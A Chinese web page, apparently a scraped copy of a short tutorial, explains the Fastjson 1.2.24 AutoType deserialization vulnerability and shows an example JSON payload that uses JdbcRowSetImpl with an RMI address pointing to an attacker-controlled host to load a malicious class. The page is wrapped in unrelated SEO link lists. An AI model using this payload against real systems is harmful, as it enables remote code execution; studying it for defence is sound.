当前位置: 首页 > wzjs >正文

数字营销技术应用网站什么优化

数字营销技术应用网站,什么优化,金坛网站建设公司,邯郸房产网签查询系统fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用type标记字符的原始类型&#x…

fastjson漏洞

  • fastjson工作原理
  • 攻击原理
    • 补充
  • 例子

fastjson工作原理

fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用==@type==标记字符的原始类型,在反序列话时会读取@type以此把内容反序列化到对象,在上述过程中会调用到库中的setter和getter方法

攻击原理

攻击者传入一个恶意构造的json内容,程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数,进而促使恶意代码执行
合理构造一个JSON使用@type指定一个想要攻击的类库就可以实现攻击

补充

仅影响Fastjson1.2.24及之前版本

例子


{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "rmi://攻击者的IP地址/恶意类","autoCommit": true}
  • JSON 数据包:这里展示的 JSON 数据包包含一个名为 b 的对象,其中有一个 @type 字段,指定了这个对象的类型为
    com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。
  • 恶意数据:在 dataSourceName 字段中,提供了一个远程方法调用 (RMI) 的 URL,指向攻击者的 IP
    地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。
  • 自动提交:autoCommit 字段被设置为 true,表明在反序列化后自动执行某些操作。
http://www.dtcms.com/wzjs/523000.html

相关文章:

  • 企业网站seo点击软件网站定制的公司
  • 医疗网站备案免费域名解析平台
  • 做个产品网站要多少钱推广赚钱的微信小程序
  • 南宁住房和城乡建设委员会网站搜索引擎调价平台哪个好
  • 做宣传 为什么要做网站那优化网站关键词的技巧
  • 做网站需要购买什么seo交互论坛
  • 网站制作说明书永久免费的建站系统有哪些
  • 苏州相城网站建设搜索优化软件
  • wordpress 登录页面变了高平网站优化公司
  • 企业网站源代码免费下载农产品营销方案
  • 淘宝网站优化实例网络营销推广主要做什么
  • 长沙交互网站设计服务商关键词挖掘长尾词
  • 网站建立不安全怎么取消友情链接教程
  • 零基础学前端要多久才能成手优化疫情防控 这些措施你应该知道
  • 公司网站在百度搜不到上海抖音seo
  • 孝感网站建设孝感seo优化的网站
  • 湖北建设网站首页国内销售平台有哪些
  • 国外自助建站免费建站平台市场推广方案和思路
  • 在哪里可以学做饰品网站河南专业网站建设
  • 钓鱼网站在线下载外贸网络推广经验
  • struts2 做的网站看书网站排名
  • 网站建设 服务内容免费发帖论坛大全
  • 菏泽官方网站seo外链
  • 网络公司的手机网站企业培训十大热门课程
  • 湖南备案网站建设方案书外链
  • 网站建设教程 企业邮箱石家庄seo按天扣费
  • 烟台网站建设方案策划百度搜索开放平台
  • 做网站需要的条件中国职业培训在线官方网站
  • 做网站如何安全 博客网上永久视频会员是真的吗
  • 网站建设模板制作是什么意思海外互联网推广平台